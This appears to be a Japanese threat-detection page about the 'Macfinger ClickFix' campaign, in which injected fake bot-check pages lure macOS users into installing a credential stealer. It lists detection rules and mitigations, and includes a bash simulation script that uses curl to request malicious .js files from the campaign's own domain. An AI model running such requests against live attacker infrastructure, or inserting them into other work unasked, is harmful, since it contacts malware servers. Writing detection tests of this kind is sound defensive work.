マックフィンガーClickFixキャンペーン
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
Macfinger ClickFixとして追跡される新しいソーシャルエンジニアリングキャンペーンが、正規のウェブサイトに悪意のあるスクリプトを注入してmacOSユーザーを標的にしています。この攻撃は、被害者をだましてmacOS専用のマルウェアをダウンロードするコマンドを実行させる偽のボット保護ページを提示します。ペイロードは、認証情報やその他のユーザー情報を盗むために設計されたAtomic macOS Stealer(AMOS)の変種と思われます。
調査
調査では、偽の認証ポップアップを表示するようにスクリプトが注入された正規のウェブサイトが特定されました。ネットワークトラフィック分析により、ユーザー追跡のために使用された専用ドメインと、マルウェア配信およびコマンド&コントロール(C2)通信をサポートする複数のIPアドレスが明らかになりました。観測されたトラフィックパターンは、HTTP POSTリクエストを通じた認証情報およびシステム情報の外部送信を示しています。
緩和策
ユーザーは、予期しないブラウザポップアップや偽のボット認証ページに表示される指示に従わないように訓練するべきです。組織は、ClickFixキャンペーンに関連する既知の悪意のあるドメインおよびIPアドレスをブロックするためにWebフィルタリングを導入すべきです。また、非標準ポートを介した不信なIPアドレスへの異常な外向き接続を監視することも推奨されます。
対応策
Macfinger ClickFixの活動が検出された場合、影響を受けたmacOSホストはすぐに隔離して、さらなるデータ漏洩を防ぐべきです。対応者は、認証情報漏洩の範囲を特定するために完全なフォレンジック調査を行うべきです。潜在的に露出した認証情報はリセットされるべきであり、システムは無許可のシェルスクリプトやMach-Oバイナリなどの持続手段があるかどうかを確認する必要があります。
攻撃フロー
この部分はまだ更新中です。
検出
可能性のあるIPルックアップドメイン通信が試みられました(dns経由)
非表示のトップレベルドメイン(TLD)DNSリクエストによる不審なコマンド&コントロール(dns経由)
可能性のあるSystem_profiler列挙の試み(プロセス作成経由)
可能性のあるBase64エンコードされた文字列操作 [MacOS](cmdline経由)
不審なCurl実行の試み [MacOS](cmdline経由)
検出用のIOC(HashSha256):Macfinger ClickFixキャンペーン
検出用のIOC(SourceIP):Macfinger ClickFixキャンペーン
検出用のIOC(DestinationIP):Macfinger ClickFixキャンペーン
Macfinger ClickFixキャンペーンのトラフィックを検出する [ファイアウォール]
Macfinger ClickFixスクリプト注入を検出する [Webサーバー]
シミュレーション実行
-
攻撃シナリオとコマンド: 敵対者は「ClickFix」として知られるソーシャルエンジニアリングテクニックを使用し、ユーザーにボタンをクリックさせる(しばしば偽の「修正」または「更新」)ことで悪意のあるスクリプトを実行させます。このシミュレーションでは、最終段階を模倣し、クライアント側のブラウザ/エージェントがMacfinger管理のドメインへのリクエストを行います
velvet-otter-glagceis.life悪意のある.jsファイルを取得します。このリクエストは、検出ロジック内の三つの特定の選択基準のいずれかに一致するように設計されています。 -
回帰テストスクリプト:
#!/bin/bash # Macfinger ClickFix検出ルールをトリガーするシミュレーションスクリプト echo "[*] Macfinger ClickFix シミュレーションを開始しています..." # ターゲット 1: selection1 (site parameter) echo "[*] selection1へのリクエストをシミュレートしています..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.js?site=test_payload" # ターゲット 2: selection2 (specific hash file) echo "[*] selection2へのリクエストをシミュレートしています..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/t.4b1009ff6c3f.js" # ターゲット 3: selection3 (ext-b file) echo "[*] selection3へのリクエストをシミュレートしています..." curl -s -o /dev/null "http://velvet-otter-glagceis.life/ext-b.4f9db6afad06a.js" echo "[+] シミュレーションが完了しました。SIEMでアラートを確認してください。" -
クリーンアップコマンド:
# これらはアウトバウンドネットワークリクエストなので、ローカルのクリーンアップは必要ありません。 # ローカルファイルが作成された場合、削除します: rm -f /tmp/macfinger_test_*